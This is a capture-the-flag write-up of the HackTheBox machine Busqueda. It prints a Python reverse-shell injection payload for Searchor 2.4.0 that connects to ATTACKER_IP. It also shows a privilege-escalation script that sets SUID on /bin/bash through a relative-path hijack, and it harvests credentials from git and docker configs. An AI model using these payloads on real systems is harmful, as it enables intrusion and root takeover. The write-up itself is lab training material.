---
# System prepended metadata

title: HTB - Busqueda

---

# HTB Busqueda - writeup
nmap
![image](https://hackmd.io/_uploads/ByhBnXHtbl.png)
**1. Apache surver**
**2. ssh**
## USER'S FLAG
add header to "/etc/hosts":
![image](https://hackmd.io/_uploads/HkVKT7HKWe.png)

website:
![image](https://hackmd.io/_uploads/rJL8R7HFZg.png)

**vulnerable : 2.4.0**

https://github.com/nexis-nexis/Searchor-2.4.0-POC-Exploit-
payload: 
```
', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

DESCRYPTION:

```

use payload
![image](https://hackmd.io/_uploads/rkUWJ4BFWx.png)

get shell
![image](https://hackmd.io/_uploads/SkEooQBFbl.png)

**HERE WE GOT USER'S FLAG**
## ROOT'S FLAG


use `cat /var/www/app/.git/config` to see what is show
![image](https://hackmd.io/_uploads/S1151VHF-l.png)
we get cody's pw

ssh
![image](https://hackmd.io/_uploads/HyCmZ4HFbg.png)

see what cody can execute
![image](https://hackmd.io/_uploads/rkT2WESYWx.png)

`system-chechup.py` can be run as root
![image](https://hackmd.io/_uploads/ry-dMNHFbe.png)
see running docker
![image](https://hackmd.io/_uploads/S10rXNSKZx.png)
target docker is "gitea"
know how to use format
https://docs.docker.com/reference/cli/docker/inspect/
![image](https://hackmd.io/_uploads/H1gs44rtbl.png)
https://docs.docker.com/engine/cli/formatting/
wanna see datas in the dockers
![image](https://hackmd.io/_uploads/SkLCVNBY-e.png)

use `| jq` to make it easy to read
![image](https://hackmd.io/_uploads/SymGQrrK-e.png)

find database's pw
![image](https://hackmd.io/_uploads/H1w3GrHYbe.png)

change header from `/etc/hosts`
![image](https://hackmd.io/_uploads/SyuhtNStbl.png)

load into website
![image](https://hackmd.io/_uploads/SJCx8HBKZe.png)
see users
![image](https://hackmd.io/_uploads/S1BvISStbe.png)

use the database's pw to login
![image](https://hackmd.io/_uploads/H1xiIBSFbg.png)

findout a script which can only be read by admin
![image](https://hackmd.io/_uploads/HJfyPHHtZx.png)

`full-checkup` is what user(svc) can run
![image](https://hackmd.io/_uploads/SJmgvrSYbe.png)

**vulnerable: `full-check` action use `./` to run, didn't use the full path**
![image](https://hackmd.io/_uploads/HJofPSHF-g.png)

fake a '`full-checkup.sh`' file and put payload in

```
#!/bin/bash
chmod +s /bin/bash

DESCRYPTION:

```
use vi to create 'full-checkup.sh' in /tmp, and make it executable
![image](https://hackmd.io/_uploads/ryN3cHrFZg.png)

run `full-checkup` and get shell, using `-p` to keep priviliage
![螢幕擷取畫面 2026-03-04 140639](https://hackmd.io/_uploads/rJe8J8SK-x.png)

see what do we got in `/root/`
![image](https://hackmd.io/_uploads/r1wPCSHYWx.png)

**HERE WE GOT ROOT'S FLAG**